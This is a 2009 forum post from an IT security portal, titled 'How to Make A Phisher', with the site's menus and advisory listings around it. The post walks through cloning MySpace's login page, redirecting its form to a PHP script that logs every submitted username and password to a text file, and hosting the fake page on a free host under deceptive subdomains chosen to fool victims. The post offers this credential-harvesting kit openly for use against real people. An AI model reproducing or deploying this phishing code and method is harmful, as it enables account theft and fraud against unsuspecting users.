Waraxe IT Security Portal
Login or Register
December 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 126
Members: 0
Total: 126
Full disclosure
Stored XSS with Filter Bypass - blogenginev3.3.8
[SYSS-2024-085]: Broadcom CA Client Automation - Improper Privilege Management (CWE-269)
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
APPLE-SA-12-11-2024-2 iPadOS 17.7.3
APPLE-SA-12-11-2024-1 iOS 18.2 and iPadOS 18.2
SEC Consult SA-20241211-0 :: Reflected Cross-Site Scripting in Numerix License Server Administration System Login
St. Poelten UAS | Multiple Vulnerabilities in ORing IAP
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Phishing and Social Engineering -> How to Make A Phisher [TriCk aka Saywhat?]
Post new topicReply to topic View previous topic :: View next topic
How to Make A Phisher [TriCk aka Saywhat?]
PostPosted: Fri Sep 25, 2009 5:28 pm Reply with quote
trick123
Active user
Active user
Joined: Jul 11, 2009
Posts: 35




*****************************************************
Tutorial: How to Make Phishers
Author: Trick aka Saywhat?
Contact: badnews_saywhat@hotmail.com // p0ison.org
*****************************************************
What are Phishers?
- Phishing is the act of tricking someone into giving them confidential information or tricking them into doing something that they normally wouldn't do...

- The attempt to fraudulently acquire sensitive information (eg, passwords, account numbers, or financial information) by masquerading as a trustworthy person or business in a seemingly official communication.

(source: Google ;p)
*****************************************************
The type of Phisher We are making today is a Website Phisher, a website Phisher is a web-page that looks exactly like the Web-page of your target so it tricks them into logging in or submitting information which then gets sent to a log file or your email, i have chosen to Make a phisher for www.myspace.com

1. go to your target URL i have chosen www.myspace.com

2. View the source, Firefox users Press CTRL + U, internet explorer users Right Click > View Source

3. A Notepad file should appear, Copy all the text (right click > Select all), then paste it on a new Notepad file, call this file index.html

4. we now need to make the page send all the Usernames and password Submitted to send to a text file, to do this on your notepad file press CTRL + F and a search box should appear, Search for Action

keep Looking until you bump into something like this:
Code:

action="http://searchservice.myspace.com/index.cfm?"

Your URL would be differnt as im making one for myspace.

Change that code to this:
Code:
action="/login.php"


5. Now save the Notepad file as index.html

6. Open a New Notepad file and copy and paste this code in it:
Code:
<?php
header ('Location: https://myspace.com ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

in the code where is says https://myspace.com change yours to Target site.

6. Save this file as login.php

7. make an account on a free host that supports PHP i would use www.t35.com its never gave me any issues/problems (remember to make your domain releated to the phisher e.g www.myspace.t35.com, www.myspace-hacks.t35.com, www.myspace-porn.t35.com) something your victim will fall for.

8. once you have your Hosting Set up Upload the index.html and login.php files

9. Now make a new file Called, log.txt (this is where all the passwords + usernames will go) [/COLOR]

Remember to Chmod this to 7777 (click all boxes)

NOW TEST IF YOUR PHISHER WORKS GO TO THE DOMAIN AND LOGIN AND CHECK IF THE PASSWORD+USERNAME GOES TO THE LOG.TXT, SOMETIMES IT CAN TAKE A FEW HOURS TO SUMBIT.

Errors:

My Pics don't show on my index page?

- open it in note pad and make sure all the links like.g
/images/lol.html are changed to myspace.com/images/lol.html

My Logs don't come through:

- Sometimes it takes time for them to sumbit
- your host might not support PHP
- remember to CHMOD the log.txt to 7777 (tick all boxes)

- TRICK AKA SAYWHAT? www.p0ison.org
View user's profile Send private message
How to Make A Phisher [TriCk aka Saywhat?]
www.waraxe.us Forum Index -> Phishing and Social Engineering
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.037 Seconds